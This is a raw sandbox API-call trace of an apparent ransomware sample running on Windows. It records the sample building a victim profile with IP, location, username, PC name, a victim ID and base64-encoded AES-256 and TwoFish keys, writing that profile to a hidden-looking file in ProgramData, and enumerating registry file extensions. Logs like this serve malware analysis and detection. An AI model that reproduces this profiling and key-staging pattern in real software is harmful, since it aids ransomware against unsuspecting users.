0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] ResetEvent (hEvent=0x3f4) returned 1 [0103.378] CloseHandle (hObject=0x3f4) returned 1 [0103.378] CloseHandle (hObject=0x3f0) returned 1 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.378] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] shutdown (s=0x3d0, how=1) returned 0 [0103.379] closesocket (s=0x3d0) returned 0 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.379] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] GetCurrentThreadId () returned 0x1358 [0103.380] LoadStringW (in: hInstance=0x400000, uID=0xff47, lpBuffer=0x19dcd8, cchBufferMax=4096 | out: lpBuffer="64-bit Edition") returned 0xe [0103.380] LoadStringW (in: hInstance=0x400000, uID=0xff44, lpBuffer=0x19dcd4, cchBufferMax=4096 | out: lpBuffer="%s (Version %d.%d, Build %d, %5:s)") returned 0x22 [0103.380] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x19f524, nSize=0x400 | out: lpBuffer="FD1HVy") returned 0x6 [0103.380] GetEnvironmentVariableW (in: lpName="COMPUTERNAME", lpBuffer=0x19f524, nSize=0x400 | out: lpBuffer="NQDPDE") returned 0x6 [0103.381] CreateFileW (lpFileName="C:\\ProgramData\\TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=" (normalized: "c:\\programdata\\tvpssuq5nke4otzfmzjfx19uyxjpacgxnibnyxj0idiwmjagugf6yxj0zxnpkv9fu2fhdcgxms00mc01osk="), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0103.382] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--------------------------------------- User Hakkında ---------------------------------------\r\n\r\nIP Address: 95.222.165.118\r\nKıta Kodu: EU\r\nKıta Adı: Europe\r\nÜlke Kodu: DE\r\nÜlke Adı: Germany\r\nŞehir Adı: North Rhine-Westphalia\r\nCity: Bonn\r\n\r\nOS About: Windows 10 (Version 10.0, Build 15063, 64-bit Edition)\r\nUserName: FD1HVy\r\nPC Name: NQDPDE\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- User ID ---------------------------------------\r\n\r\nID: MZRID96A896E32E\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- Encryption Key ---------------------------------------\r\n\r\nKey[AES-256]: N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==\r\n\r\nKey[TwoFish]: RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n", cchWideChar=4789, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4789 [0103.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--------------------------------------- User Hakkında ---------------------------------------\r\n\r\nIP Address: 95.222.165.118\r\nKıta Kodu: EU\r\nKıta Adı: Europe\r\nÜlke Kodu: DE\r\nÜlke Adı: Germany\r\nŞehir Adı: North Rhine-Westphalia\r\nCity: Bonn\r\n\r\nOS About: Windows 10 (Version 10.0, Build 15063, 64-bit Edition)\r\nUserName: FD1HVy\r\nPC Name: NQDPDE\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- User ID ---------------------------------------\r\n\r\nID: MZRID96A896E32E\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- Encryption Key ---------------------------------------\r\n\r\nKey[AES-256]: N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==\r\n\r\nKey[TwoFish]: RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n", cchWideChar=4789, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4789 [0103.383] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="--------------------------------------- User Hakkında ---------------------------------------\r\n\r\nIP Address: 95.222.165.118\r\nKıta Kodu: EU\r\nKıta Adı: Europe\r\nÜlke Kodu: DE\r\nÜlke Adı: Germany\r\nŞehir Adı: North Rhine-Westphalia\r\nCity: Bonn\r\n\r\nOS About: Windows 10 (Version 10.0, Build 15063, 64-bit Edition)\r\nUserName: FD1HVy\r\nPC Name: NQDPDE\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- User ID ---------------------------------------\r\n\r\nID: MZRID96A896E32E\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- Encryption Key ---------------------------------------\r\n\r\nKey[AES-256]: N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==\r\n\r\nKey[TwoFish]: RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n", cchWideChar=4789, lpMultiByteStr=0x2429c38, cbMultiByte=4789, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="--------------------------------------- User Hakkinda ---------------------------------------\r\n\r\nIP Address: 95.222.165.118\r\nKita Kodu: EU\r\nKita Adi: Europe\r\nÜlke Kodu: DE\r\nÜlke Adi: Germany\r\nSehir Adi: North Rhine-Westphalia\r\nCity: Bonn\r\n\r\nOS About: Windows 10 (Version 10.0, Build 15063, 64-bit Edition)\r\nUserName: FD1HVy\r\nPC Name: NQDPDE\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- User ID ---------------------------------------\r\n\r\nID: MZRID96A896E32E\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n\r\n--------------------------------------- Encryption Key ---------------------------------------\r\n\r\nKey[AES-256]: N0JEMDVEMkQ1QzdFMEE4NEY1M0JCODZFM0Q2MzZDQTgzN0RFODU3MTFFMTIyNUJDMjc5RjAxRENDMDE0NDI1M0IxQUE2RjI3MDY3NjQ4RkVBNUY2MkNFNzY2NjRBMDkzNzA5OUY1ODkwRjQ4MzMwQjU2MjU4NzVERDU2Rjc1NDkzMDczNzI2MjdFNDg1MDRCNzNCMjgxNUNFRTJCMUQxRTAwMDYxM0M5QkI2QzcyNUY1QkM1OUE5MUUxRUE1Q0EyMjc1MTA0NTlDNkE3Rjc1RkEzMkUyNUY4MEIwOEFGN0IyMTY2NjRGODgwNDlENDk4NjQ0QkI1RUM1NjFFRkNGOUZDOUI3M0VGODVCQjY5MzJCRTIxQkUxOTY5QkY5NDdGODAxOTgyRjIyRjQxQUQxODM1ODVBNkI3REFCQTlGMEQ1N0JERDMyOTc1QkMwMjNGNzJCMzEzNjFDOTA4NTBFNEYxRDc5QUY3NUNDOTYzNDRBNEM3OEZFRjU3REVDMUUxNDM4ODFCNTA3NTVDNjVGOEYwNTM3MkI4M0U0RDc4RjU2ODg4QUQ3OTRGODlENEU2RUQ5OTg4NjNGOUIxNjNEQ0UxMTA5NzAzRTg2QzY3NjA1QzkwM0IyN0ZGQTAxOTE1NTE0RDQyMjE0NzZFRkVERDUwQjQzOTc5MzRERDdCNUFCNEJFMDYyMzI0RjMyMjhGMzE0MjAxM0U5OEY0MzFGODQ5QTcyMEZBMDJCOUY2N0I4RTFBNjM5OUJDMEY1MDQ4NzZGRDFDQjUwNDVCMDVCMTRCOTBERTZFRjkwMTYzNzgw==\r\n\r\nKey[TwoFish]: RDRCRkI1MEI1MDQxNjI1Nzc3NjdBRTA2Q0MxNzc0M0E0OUZEOTIyRTMzQTM5NzZDMkJEMDExNTc4NUYxREE0Q0U4N0ZFQzIxRDAxQjFDMDZGMkJBNTM3OTRDRTNFNjYzNDY2ODVCQUIyNjFDODdEMTZGOTdBRjE2Q0Q0OUMwMEY0RDAyODlBMjQ4ODQxRDc3NjBDMkNBNERENkRFNTBCQTczNjE5ODAzNDc4M0RGREE3QThFQUFGRjQ3QkQ0QjE4Qzc2RURGMkQyOEI3OURGOUJEMDI2RDgwRUY4RjAyMEFDMUQ4QzkxMzAwMURGMzBGODAzRjk1M0E5MjJFRTM3QzgyODk1ODc5MDUxMTQ5MzIxNzFEQ0FDNjMyRTJCQTk1ODQxRjgxQjk0RjYxOTYxMEVDNkIxOTgzQTM5MzQxOTdFQkUwQzBDRUU3MzZERTE3RjNERUI0ODNCQzQ3MkVFRjI0N0FCNzQ5MDcyQ0EzMEUwOTE0MzI4QjcxNjQ4NDA3ODQwMzNBNkJEQjBENjJDNjE2OTE1MEQzQkRGMDc2OTI3Q0M2NzYyQTdGNTA0ODRFQzlBMDEwNjY2NzJGQzA4MDMzQzZFQkZGMzFBRjNEQUU0Qjk2RTlEMzhCQjUwRkJBN0NGRjNFMjc0MTMwRTYyQjQwOUMzODZDMDVBNjlCMzczMjQxNUI2MkRFN0JEODQzRDM5NEZEMDdGMTczNzk2ODQ5NTc4MTMxMkE1NTMzOTJCOEE3NDExQjRERkU5Rjg4REVEMDQ3QkE3OTE0MDVCRDFFODQ3RUYzRkE3ODlBMTA5==\r\n\r\n----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------\r\n\r\n", lpUsedDefaultChar=0x0) returned 4789 [0103.383] WriteFile (in: hFile=0x3d0, lpBuffer=0x2429c38*, nNumberOfBytesToWrite=0x12b5, lpNumberOfBytesWritten=0x19fca0, lpOverlapped=0x0 | out: lpBuffer=0x2429c38*, lpNumberOfBytesWritten=0x19fca0*=0x12b5, lpOverlapped=0x0) returned 1 [0103.384] CloseHandle (hObject=0x3d0) returned 1 [0103.386] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x247ab6c, cbMultiByte=10, lpWideCharStr=0x19ed28, cchWideChar=2047 | out: lpWideCharStr="MaMo434376\x12") returned 10 [0103.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="MaMo434376", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0103.386] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="MaMo434376", cchWideChar=10, lpMultiByteStr=0x247aa6c, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MaMo434376", lpUsedDefaultChar=0x0) returned 10 [0103.386] GetCurrentThreadId () returned 0x1358 [0103.387] GetCurrentThreadId () returned 0x1358 [0103.387] GetCurrentThreadId () returned 0x1358 [0103.387] CreateFileW (lpFileName="C:\\ProgramData\\TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=" (normalized: "c:\\programdata\\tvpssuq5nke4otzfmzjfx19uyxjpacgxnibnyxj0idiwmjagugf6yxj0zxnpkv9fu2fhdcgxms00mc01osk="), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0103.387] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fc6c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19fc6c*=0) returned 0x0 [0103.387] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fc64*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x19fc64*=0) returned 0x0 [0103.387] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fc64*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x19fc64*=0) returned 0x12b5 [0103.387] SetFilePointer (in: hFile=0x3d0, lDistanceToMove=0, lpDistanceToMoveHigh=0x19fc64*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x19fc64*=0) returned 0x0 [0103.387] ReadFile (in: hFile=0x3d0, lpBuffer=0x2435e60, nNumberOfBytesToRead=0x12b5, lpNumberOfBytesRead=0x19fc78, lpOverlapped=0x0 | out: lpBuffer=0x2435e60*, lpNumberOfBytesRead=0x19fc78*=0x12b5, lpOverlapped=0x0) returned 1 [0103.387] CloseHandle (hObject=0x3d0) returned 1 [0103.388] CreateFileW (lpFileName="C:\\ProgramData\\TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=" (normalized: "c:\\programdata\\tvpssuq5nke4otzfmzjfx19uyxjpacgxnibnyxj0idiwmjagugf6yxj0zxnpkv9fu2fhdcgxms00mc01osk="), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0103.389] WriteFile (in: hFile=0x3d0, lpBuffer=0x2437e90*, nNumberOfBytesToWrite=0x12b5, lpNumberOfBytesWritten=0x19fc84, lpOverlapped=0x0 | out: lpBuffer=0x2437e90*, lpNumberOfBytesWritten=0x19fc84*=0x12b5, lpOverlapped=0x0) returned 1 [0103.389] CloseHandle (hObject=0x3d0) returned 1 [0103.392] GetCurrentThreadId () returned 0x1358 [0103.392] GetCurrentThreadId () returned 0x1358 [0103.392] GetCurrentThreadId () returned 0x1358 [0103.392] CreateFileW (lpFileName="C:\\ProgramData\\TVpSSUQ5NkE4OTZFMzJFX19UYXJpaCgxNiBNYXJ0IDIwMjAgUGF6YXJ0ZXNpKV9fU2FhdCgxMS00MC01OSk=" (normalized: "c:\\programdata\\tvpssuq5nke4otzfmzjfx19uyxjpacgxnibnyxj0idiwmjagugf6yxj0zxnpkv9fu2fhdcgxms00mc01osk="), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x3d0 [0103.394] RegOpenKeyExW (in: hKey=0x80000000, lpSubKey="", ulOptions=0x0, samDesired=0x20019, phkResult=0x19fc28 | out: phkResult=0x19fc28*=0x80000000) returned 0x0 [0103.394] RegQueryInfoKeyW (in: hKey=0x80000000, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x19fc0c, lpcbMaxSubKeyLen=0x19fc10, lpcbMaxClassLen=0x0, lpcValues=0x19fc14, lpcbMaxValueNameLen=0x19fc18, lpcbMaxValueLen=0x19fc1c, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x19fc20 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x19fc0c*=0x1269, lpcbMaxSubKeyLen=0x19fc10, lpcbMaxClassLen=0x0, lpcValues=0x19fc14*=0x0, lpcbMaxValueNameLen=0x19fc18, lpcbMaxValueLen=0x19fc1c, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x19fc20) returned 0x0 [0103.522] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x0, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="*", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0103.577] RegEnumKeyExW (in: hKey=0x80000000, dwIndex=0x1, lpName=0x2406a6c, lpcchName=0x19fc28, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName=".386", lpcchName=0x19fc28, lpClass=0x0, lpcchClass=0x0, 